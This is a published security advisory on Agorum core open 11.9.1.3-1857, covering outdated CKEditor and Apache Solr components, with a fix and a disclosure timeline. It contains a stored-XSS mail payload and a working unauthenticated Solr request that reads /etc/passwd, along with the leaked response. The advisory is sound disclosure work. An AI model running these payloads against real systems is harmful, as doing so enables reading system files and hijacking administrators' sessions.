usd-2025-0029 | Agorum core open 11.9.1.3-1857 - Dependency on Vulnerable Third-Party Component

Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Dependency on Vulnerable Third-Party Component (CWE-1395)
Security Risk: Critical
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Requested
CVE Link: Requested
Advisory ID: usd-2025-0029

Description

Agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.

Proof of Concept

The application depends on third-party components that contain known and exploitable vulnerabilities.
Below are two examples of such vulnerable components, each with known public CVEs and documented exploit paths.

CKEditor 4.6.2 - CVE-2024-24816

CKEditor 4 < 4.24.0-lts - XSS vulnerability in samples that use the "preview" feature.
https://github.com/afine-com/CVE-2024-24816

Agroum core integrates CKEditor for its built-in mail functionality, which introduces a potential privilege escalation risk. A low-privileged user could craft an email containing malicious JavaScript and send it to an administrative user. If the administrative user opens the email, the embedded JavaScript will execute within the context of their browser session.

The following payload can be used to craft a malicious mail:

<p>&gt;</p><p><a href="javascript:alert(document.domain)">XSS</a></p><p>&nbsp;</p>

Apache Solr 7.7.2 - Arbitrary File Read

The application uses an outdated version of Apache Solr, which contains several known vulnerabilities. Additionally, Apache Solr is configured to allow unauthenticated access.
For instance, an unauthenticated attacker could gain access to arbitrary system files by sending the following request to the Apache Solr server:

GET /solr/agorumsolr01_shard1_replica_n1/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1
Host: localhost:8981
[...]

The response reveals the content of /etc/passwd, as shown below:

HTTP/1.1 200 OK
Content-Type: application/json;charset=utf-8
Content-Length: 4123
{
  "responseHeader":{    
    "status":0,
    "QTime":2,
    "handler":"org.apache.solr.handler.DumpRequestHandler",
    "params":{
      "param":"ContentStream",
      "stream.url":"file:///etc/passwd"}},
  "params":{
    "stream.url":"file:///etc/passwd",
    "echoHandler":"true",
    "param":"ContentStream",
    "echoParams":"explicit"},
  "streams":[{
      "name":null,
      "sourceInfo":"url",
      "size":null,
      "contentType":null,
      "stream":"root:x:0:0:root:/root:/usr/bin/zsh[...]

These two exploits serve as simple demonstrations of how outdated components can be leveraged for immediate attacks. However, the core issue lies in the use of outdated third-party libraries, which inherently expose the application to numerous known vulnerabilities. Addressing these outdated dependencies is crucial to mitigating a wide range of potential threats beyond just these examples.

Fix


It is essential to regularly update and patch third-party components and libraries. This includes performing vulnerability assessments to identify outdated or unsupported dependencies, and replacing them with secure, up-to-date versions. Implementing automated tools for dependency management, such as dependency checkers or vulnerability scanners, can help proactively identify and address these issues. Additionally, consider using Software Bill of Materials (SBOM) to track and audit all third-party components and their versions in use.

 

Users of agorum core open can upgrade to 11.9.2 or 11.10.1.

References

Timeline

  • 2025-05-05: First contact request via mail.
  • 2025-05-05: The vendor has confirmed the delivery and has begun investigating the matter.
  • 2025-05-07: The vendor has begun addressing and fixing the issue.
  • 2025-05-15: The vendor has addressed and fixed the vulnerability within the cloud instances.
  • 2025-05-30: The vendor released fixed versions 11.9.2 and 11.10.1.
  • 2025-06-27: This advisory is published.

Credits

This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.